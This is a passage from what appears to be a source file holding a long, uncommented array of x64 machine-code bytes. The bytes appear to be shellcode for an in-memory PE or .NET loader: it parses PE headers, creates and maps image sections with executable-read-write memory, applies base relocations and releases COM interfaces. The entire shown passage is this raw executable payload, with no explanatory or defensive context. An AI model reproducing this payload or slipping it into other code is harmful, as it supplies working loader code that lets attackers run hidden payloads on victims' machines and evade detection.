886 0x85, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48,
887 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x88, 0x88, 0x00, 0x00,
888 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x30,
889 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48,
890 0x8b, 0x95, 0xc8, 0x02, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1,
891 0x41, 0xff, 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xd4,
892 0x02, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x1d, 0x02, 0x00, 0x00, 0x48, 0xc7,
893 0x85, 0xd8, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
894 0x08, 0x03, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84,
895 0xc0, 0x0f, 0x84, 0x4a, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x03,
896 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xf0,
897 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x03, 0x00,
898 0x00, 0xe8, 0x67, 0xe1, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00,
899 0x00, 0x4c, 0x8b, 0x80, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xec,
900 0x48, 0x8d, 0x45, 0xf0, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x48, 0x89,
901 0x85, 0xb8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00,
902 0x48, 0x8b, 0x80, 0xe0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x41, 0x89,
903 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00, 0x00, 0xff,
904 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xd8,
905 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xcf, 0x00, 0x00, 0x00, 0xc7, 0x85,
906 0x0c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xaf, 0x00, 0x00,
907 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08,
908 0x01, 0x00, 0x00, 0x8b, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x89, 0xc0, 0x48,
909 0x8d, 0x0c, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x02,
910 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc1, 0xff,
911 0xd2, 0x48, 0x89, 0x85, 0x98, 0x02, 0x00, 0x00, 0x66, 0xc7, 0x85, 0x90,
912 0x02, 0x00, 0x00, 0x08, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00,
913 0x4c, 0x8b, 0x88, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x90, 0x02,
914 0x00, 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
915 0xd8, 0x02, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff,
916 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x02, 0x00,
917 0x00, 0x00, 0x79, 0x25, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48,
918 0x8b, 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x02, 0x00,
919 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0xc7, 0x85, 0xd8, 0x02, 0x00,
920 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x83,
921 0xc0, 0x01, 0x89, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x8b, 0x85, 0x0c, 0x02,
922 0x00, 0x00, 0x8b, 0x55, 0xec, 0x39, 0xd0, 0x0f, 0x82, 0x40, 0xff, 0xff,
923 0xff, 0x83, 0xbd, 0xd4, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xa5, 0x00,
924 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40,
925 0x30, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x90, 0xc8, 0x01, 0x00, 0x00, 0x48,
926 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x48, 0x30, 0x48, 0x8b,
927 0x85, 0x30, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x38, 0x02, 0x00, 0x00,
928 0x48, 0x89, 0x45, 0xc0, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x85, 0x40,
929 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x02,
930 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0x02, 0x00, 0x00, 0x48, 0x89, 0x54,
931 0x24, 0x30, 0x48, 0x8b, 0x95, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x89, 0x54,
932 0x24, 0x28, 0x48, 0x8d, 0x55, 0xc0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41,
933 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x18, 0x01, 0x00, 0x00, 0x48,
934 0x89, 0xc2, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x48,
935 0x83, 0xbd, 0xd8, 0x02, 0x00, 0x00, 0x00, 0x74, 0x1a, 0x48, 0x8b, 0x85,
936 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48,
937 0x8b, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48,
938 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x10, 0x01, 0x00,
939 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x02, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff,
940 0xd2, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x10,
941 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x02, 0x00, 0x00, 0x48, 0x89,
942 0xc1, 0xff, 0xd2, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x68,
943 0x03, 0x00, 0x00, 0x5b, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
944 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b,
945 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48,
946 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00, 0x48, 0x8b,
947 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x89,
948 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7,
949 0x40, 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
950 0x40, 0x38, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48,
951 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b,
952 0x45, 0x18, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89,
953 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x38, 0x00, 0x00,
954 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x85,
955 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48,
956 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
957 0x40, 0x28, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b,
958 0x45, 0x18, 0x48, 0xc7, 0x40, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
959 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x85, 0xc0, 0x74, 0x75, 0x48,
960 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x4c, 0x8b,
961 0x80, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x50,
962 0x20, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1,
963 0x41, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
964 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x58, 0x48, 0x8b, 0x45,
965 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45,
966 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00,
967 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10,
968 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18,
969 0x48, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
970 0x48, 0x8b, 0x40, 0x20, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45,
971 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10,
972 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x89, 0xc1, 0xff,
973 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x20,
974 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x18,
975 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40,
976 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18,
977 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc,
978 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00, 0x00,
979 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x85, 0xc0, 0x74,
980 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00,
981 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08,
982 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18,
983 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
984 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18,
985 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b,
986 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45,
987 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00,
988 0x90, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x57, 0x56, 0x48, 0x81,
989 0xec, 0x70, 0x05, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00,
990 0x00, 0x48, 0x89, 0x8d, 0x10, 0x05, 0x00, 0x00, 0x48, 0x89, 0x95, 0x18,
991 0x05, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x03, 0x00, 0x00, 0x00, 0x00,
992 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb0, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00,
993 0x00, 0x48, 0xc7, 0x85, 0x98, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
994 0x48, 0xc7, 0x45, 0x70, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x68,
995 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x48,
996 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x90, 0x04, 0x00,
997 0x00, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x48, 0x05, 0x28, 0x05,
998 0x00, 0x00, 0x48, 0x89, 0x85, 0x88, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85,
999 0x88, 0x04, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x04, 0x00, 0x00, 0x48,
1000 0x8b, 0x85, 0x80, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0,
1001 0x48, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
1002 0x85, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00,
1003 0x48, 0x8b, 0x40, 0x40, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
1004 0x89, 0x85, 0x70, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x04, 0x00,
1005 0x00, 0x48, 0x89, 0x85, 0x68, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x68,
1006 0x04, 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85,
1007 0x70, 0x04, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x60, 0x04,
1008 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x50,
1009 0x04, 0x48, 0x8b, 0x85, 0x60, 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x04,
1010 0x66, 0x39, 0xc2, 0x0f, 0x85, 0x84, 0x14, 0x00, 0x00, 0x48, 0x8b, 0x85,
1011 0x78, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x50, 0x89, 0xc0, 0x48, 0x89, 0x45,
1012 0x78, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x80, 0xb4, 0x00,
1013 0x00, 0x00, 0x89, 0x85, 0x5c, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x5c, 0x04,
1014 0x00, 0x00, 0x00, 0x0f, 0x95, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0x58,
1015 0x04, 0x00, 0x00, 0x83, 0xbd, 0x58, 0x04, 0x00, 0x00, 0x00, 0x75, 0x0f,
1016 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48,
1017 0x89, 0x45, 0x70, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f, 0xb6,
1018 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x5e, 0x48, 0x8d, 0x4d,
1019 0x78, 0x48, 0x8d, 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90,
1020 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x38, 0x48, 0xc7, 0x44, 0x24,
1021 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00,
1022 0x08, 0xc7, 0x44, 0x24, 0x20, 0x40, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9,
1023 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x1f, 0x00, 0x0f, 0x00, 0x48,
1024 0x89, 0xc1, 0xe8, 0xca, 0x3b, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00,
1025 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x89, 0x57, 0x01,
1026 0x00, 0x00, 0xe9, 0xf1, 0x13, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05,
1027 0x00, 0x00, 0x4c, 0x8b, 0x80, 0xb0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1028 0x10, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x90, 0xfb, 0x05, 0x00, 0x00, 0x48,
1029 0x8d, 0x45, 0x10, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0xc7, 0x45, 0xe0,
1030 0x30, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe8, 0x00, 0x00, 0x00, 0x00,
1031 0xc7, 0x45, 0xf8, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x48,
1032 0x89, 0x45, 0xf0, 0x48, 0xc7, 0x45, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
1033 0xc7, 0x45, 0x08, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x45, 0x20, 0x48,
1034 0x8d, 0x4d, 0xe0, 0x48, 0x8d, 0x45, 0x38, 0x48, 0x8b, 0x95, 0x90, 0x04,
1035 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x58, 0xc7, 0x44, 0x24, 0x50, 0x00,
1036 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00,
1037 0xc7, 0x44, 0x24, 0x40, 0x40, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38,
1038 0x01, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x01, 0x00, 0x00, 0x00,
1039 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24,
1040 0x20, 0x00, 0x00, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba,
1041 0x00, 0x00, 0x00, 0x80, 0x48, 0x89, 0xc1, 0xe8, 0xa7, 0x3c, 0x00, 0x00,
1042 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00,
1043 0x00, 0x0f, 0x88, 0xfd, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x38, 0x48,
1044 0x83, 0xf8, 0xff, 0x0f, 0x84, 0xef, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45,
1045 0x38, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xe2, 0x12, 0x00, 0x00, 0x48, 0x8b,
1046 0x55, 0x38, 0x48, 0x8d, 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d,
1047 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x4c, 0x24, 0x38, 0x48, 0x89, 0x54,
1048 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x01, 0xc7, 0x44,
1049 0x24, 0x20, 0x02, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
1050 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x1f, 0x00, 0x0f, 0x00, 0x48,
1051 0x89, 0xc1, 0xe8, 0x86, 0x3a, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00,
1052 0x00, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00,
1053 0x48, 0x89, 0xc1, 0xe8, 0x19, 0x3b, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04,
1054 0x00, 0x00, 0x00, 0x0f, 0x88, 0x7a, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x85,
1055 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x70, 0x48, 0x8b, 0x95, 0x90,
1056 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x50, 0xc7, 0x44, 0x24, 0x48,
1057 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00,
1058 0xc7, 0x44, 0x24, 0x38, 0x02, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0x68,
1059 0x48, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00,
1060 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41,
1061 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc2, 0xff,
1062 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x2a, 0x3a, 0x00, 0x00, 0x89,
1063 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00,
1064 0x0f, 0x88, 0x08, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x85,
1065 0xc0, 0x0f, 0x84, 0xfe, 0x11, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05,
1066 0x00, 0x00, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x74,
1067 0x5b, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45,
1068 0x68, 0x48, 0x89, 0x45, 0x58, 0x48, 0x8d, 0x4d, 0x58, 0x48, 0x8d, 0x45,
1069 0x60, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
1070 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
1071 0x20, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89,
1072 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x84, 0x3a, 0x00,
1073 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00,
1074 0x00, 0x00, 0x0f, 0x88, 0x94, 0x11, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78,
1075 0x04, 0x00, 0x00, 0x8b, 0x48, 0x54, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x8b,
1076 0x95, 0x88, 0x04, 0x00, 0x00, 0x41, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8,
1077 0x90, 0x32, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x0f,
1078 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xd0, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00,
1079 0x00, 0x48, 0x01, 0xd0, 0x48, 0x83, 0xc0, 0x18, 0x48, 0x89, 0x85, 0x48,
1080 0x04, 0x00, 0x00, 0xc7, 0x85, 0xac, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00,
1081 0x00, 0xe9, 0x91, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00,
1082 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1,
1083 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x48, 0x04, 0x00, 0x00,
1084 0x48, 0x01, 0xd0, 0x44, 0x8b, 0x40, 0x10, 0x8b, 0x95, 0xac, 0x04, 0x00,
1085 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48,
1086 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x48, 0x04, 0x00,
1087 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x14, 0x89, 0xc2, 0x48, 0x8b, 0x85,
1088 0x88, 0x04, 0x00, 0x00, 0x48, 0x01, 0xc2, 0x4c, 0x8b, 0x4d, 0x70, 0x8b,
1089 0x8d, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xc8, 0x48, 0xc1, 0xe0, 0x02,
1090 0x48, 0x01, 0xc8, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc1, 0x48, 0x8b,
1091 0x85, 0x48, 0x04, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x0c, 0x89,
1092 0xc0, 0x4c, 0x01, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xd4, 0x31, 0x00, 0x00,
1093 0x83, 0x85, 0xac, 0x04, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x78, 0x04,
1094 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x85, 0xac,
1095 0x04, 0x00, 0x00, 0x0f, 0x82, 0x55, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x55,
1096 0x70, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30,
1097 0x48, 0xf7, 0xd8, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x40, 0x04, 0x00,
1098 0x00, 0x83, 0xbd, 0x58, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x06, 0x02,
1099 0x00, 0x00, 0x48, 0x83, 0xbd, 0x40, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84,
1100 0xf8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b,
1101 0x80, 0xb0, 0x00, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00, 0x00, 0x8b,
1102 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0,
1103 0x48, 0x89, 0x85, 0xb8, 0x04, 0x00, 0x00, 0xe9, 0x9b, 0x01, 0x00, 0x00,
1104 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x08, 0x48,
1105 0x89, 0x85, 0xc0, 0x04, 0x00, 0x00, 0xe9, 0x53, 0x01, 0x00, 0x00, 0x48,
1106 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0xc0,
1107 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7,
1108 0xc0, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x40,
1109 0x50, 0x39, 0xc2, 0x0f, 0x83, 0x1d, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55,
1110 0x70, 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc1,
1111 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25,
1112 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc8, 0x48, 0x01, 0xd0, 0x48,
1113 0x89, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00,
1114 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x23,
